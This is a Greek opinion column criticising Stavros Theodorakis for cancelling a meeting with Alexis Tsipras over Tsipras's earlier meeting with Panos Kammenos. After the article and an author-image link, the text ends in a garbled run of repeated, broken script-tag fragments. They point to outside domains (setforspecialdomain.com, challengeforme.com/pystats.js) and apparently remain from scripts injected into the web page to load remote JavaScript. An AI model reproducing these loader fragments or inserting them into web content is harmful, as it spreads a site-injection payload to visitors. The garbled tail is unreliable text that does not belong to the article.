Ο Τσίπρας και ο Σταύρος…Απόστολος Διαμαντής

Διαβάσαμε, κάπως έκπληκτοι, ότι ο Θεοδωράκης αρνήθηκε, λέει, να δει τον Τσίπρα, επειδή αυτός είχε συναντήσει προηγουμένως τον Καμμένο! Δεν είναι εξακριβωμένο πως ακριβώς έγινε αυτό το περιστατικό. Πάντως είναι βέβαιον, ότι ο Σταύρος είχε ο ίδιος ζητήσει συνάντηση με τον Τσίπρα, η οποία έγινε μεν αποδεκτή, αλλά αμέσως μετά ο ίδιος την ακύρωσε!

Μάλιστα έβγαλε και ολόκληρη ανακοίνωση στην οποία καυτηρίαζε τη συνάντηση Τσίπρα- Καμμένου, ως προσβλητική για την αριστερά! Μάλιστα. Και δεν θα ήταν καθόλου προσβλητική για την αριστερά η συνάντηση του αρχηγού της αξιωματικής αντιπολίτευσης με έναν επικεφαλής κόμματος υπό σχηματισμόν, που δηλώνει μάλιστα ότι επιθυμεί και κατάργηση των συνόρων; Που στο παρελθόν επικροτούσε με ενθουσιασμό και τους βομβαρδισμούς της Γιουγκοσλαβίας, συμπλέοντας τότε με τον Σημίτη και τους λοιπούς σωτήρες; Ο Καμμένος τον μάρανε;

Τι να σχολιάσει κανείς; Δηλαδή ο Σταύρος θα αναλάβει εις το εξής και τον έλεγχο των ραντεβού του Τσίπρα; Δεν έχω ματαδεί, σε χώρα του δυτικού κόσμου τουλάχιστον, να ματαιώνεται συνάντηση εξαιτίας προηγουμένου ραντεβού. Τι ακριβώς παριστάνει ο Σταύρος Θεοδωράκης; Τον Λένιν; Που δεν ήθελε να συναντήσει τους μενσεβίκους; Ή τον Μάο Τσε Τουνγκ; Ακόμη κι αυτός όμως έκανε ραντεβού με τον ίδιο τον Νίξον!

Φυσικά είναι ευδιάκριτος εδώ ένας χαριτωμένος μικρομεγαλισμός. Διότι δεν αποκλείεται, με τον αέρα που έχει πάρει το ποτάμι, εξαιτίας των δημοσκοπήσεων του Mega και των υπολοίπων, να νομίζουν εκεί ότι ο Σταύρος είναι ο εν αναμονή πρωθυπουργός. Αυτός είναι μάλλον και ο λόγος που ο Σταύρος επέτρεψε στον Σαμαρά να τον συναντήσει τις επόμενες ημέρες. Ίσως για να ενημερωθεί από τον απερχόμενο πρωθυπουργό. Για να ξέρει δηλαδή τι κράτος θα παραλάβει. Εφόσον αυτός είναι ο επερχόμενος, τώρα που κατατρόπωσε και τον φουκαρά τον Τσίπρα.

Ήμαρτον, που θάλεγε και ο Γεωργίου.

http://im2ns5.27210.gr/sites/default/files/imagecache/90x90/authors/apostolos_diamantes-175422.jpg

tvxs.gr___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >